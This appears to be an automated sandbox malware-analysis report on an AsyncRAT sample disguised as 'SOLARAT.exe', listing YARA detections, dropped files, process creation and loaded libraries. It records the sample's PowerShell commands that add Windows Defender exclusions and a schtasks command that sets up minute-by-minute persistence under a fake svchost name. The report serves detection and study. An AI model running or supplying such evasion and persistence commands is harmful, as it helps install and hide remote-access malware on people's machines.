                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: sDKRz09zM7.exe PID: 7316, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPED
                          Contains functionality to log keystrokes (.Net Source)
                          Source: not rat.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                          Source: svchost.exe.2.dr, XLogger.cs.Net Code: KeyboardLayout

                          Operating System Destruction

                          barindex
                          Protects its processes via BreakOnTermination flag
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess information set: 01 00 00 00 Jump to behavior

                          System Summary

                          barindex
                          Malicious sample detected (through community Yara rule)
                          Source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F5C762_2_00007FFB4B0F5C76
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F1F412_2_00007FFB4B0F1F41
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F6A222_2_00007FFB4B0F6A22
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F155E2_2_00007FFB4B0F155E
                          Source: C:\Users\user\AppData\Roaming\not rat.exeCode function: 2_2_00007FFB4B0F1CA12_2_00007FFB4B0F1CA1
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0F2BAA3_2_00007FFB4B0F2BAA
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E71203_2_00007FFB4B0E7120
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0E70003_2_00007FFB4B0E7000
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeCode function: 3_2_00007FFB4B0F6EC03_2_00007FFB4B0F6EC0
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C9F655_2_00007FFB4B0C9F65
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0C108C5_2_00007FFB4B0C108C
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFB4B0CAB155_2_00007FFB4B0CAB15
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B0DB8108_2_00007FFB4B0DB810
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B0D9EFB8_2_00007FFB4B0D9EFB
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFB4B1A30E98_2_00007FFB4B1A30E9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFB4B0F0FA817_2_00007FFB4B0F0FA8
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 25_2_00007FFB4B0F1CA125_2_00007FFB4B0F1CA1
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 25_2_00007FFB4B0F155E25_2_00007FFB4B0F155E
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4B0D1CA126_2_00007FFB4B0D1CA1
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 26_2_00007FFB4B0D155E26_2_00007FFB4B0D155E
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFB4B0E1CA127_2_00007FFB4B0E1CA1
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 27_2_00007FFB4B0E155E27_2_00007FFB4B0E155E
                          Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 29_2_00007FFB4B0F155E29_2_00007FFB4B0F155E
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
                          Source: BootstrapperV1.23_ModdedByHisako.exe.0.drStatic PE information: No import functions for PE file found
                          Source: sDKRz09zM7.exe, 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamenot rat.exe4 vs sDKRz09zM7.exe
                          Source: sDKRz09zM7.exe, 00000000.00000000.1356765342.0000000000D22000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSOLARAT.exe4 vs sDKRz09zM7.exe
                          Source: sDKRz09zM7.exeBinary or memory string: OriginalFilenameSOLARAT.exe4 vs sDKRz09zM7.exe
                          Source: sDKRz09zM7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 2.0.not rat.exe.df0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000000.00000002.1366284151.0000000003041000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: 00000002.00000000.1363070453.0000000000DF2000.00000002.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: C:\Users\user\AppData\Roaming\not rat.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                          Source: sDKRz09zM7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: sDKRz09zM7.exe, Program.csCryptographic APIs: 'TransformFinalBlock'
                          Source: not rat.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: not rat.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: not rat.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                          Source: svchost.exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: svchost.exe.2.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 0.2.sDKRz09zM7.exe.3059b50.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: 0.2.sDKRz09zM7.exe.3064190.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: svchost.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: svchost.exe.2.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: not rat.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                          Source: not rat.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/33@6/6
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile created: C:\Users\user\AppData\Roaming\not rat.exeJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeMutant created: \Sessions\1\BaseNamedObjects\m6Bfa5J2gE4aLnIam
                          Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7204:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7908:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\not rat.exeMutant created: \Sessions\1\BaseNamedObjects\GP0Tp1OoKfqkeZmS
                          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7424
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
                          Source: C:\Users\user\AppData\Roaming\not rat.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
                          Source: sDKRz09zM7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: sDKRz09zM7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: sDKRz09zM7.exeReversingLabs: Detection: 65%
                          Source: unknownProcess created: C:\Users\user\Desktop\sDKRz09zM7.exe "C:\Users\user\Desktop\sDKRz09zM7.exe"
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess created: C:\Users\user\AppData\Roaming\not rat.exe "C:\Users\user\AppData\Roaming\not rat.exe"
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe"
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
                          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                          Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess created: C:\Users\user\AppData\Roaming\not rat.exe "C:\Users\user\AppData\Roaming\not rat.exe" Jump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeProcess created: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\not rat.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'not rat.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 444 -p 7424 -ip 7424
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7424 -s 2180
                          Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\sDKRz09zM7.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: scrrun.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: avicap32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: msvfw32.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\not rat.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.23_ModdedByHisako.exeSection loaded: winnsi.dllJump to behavior
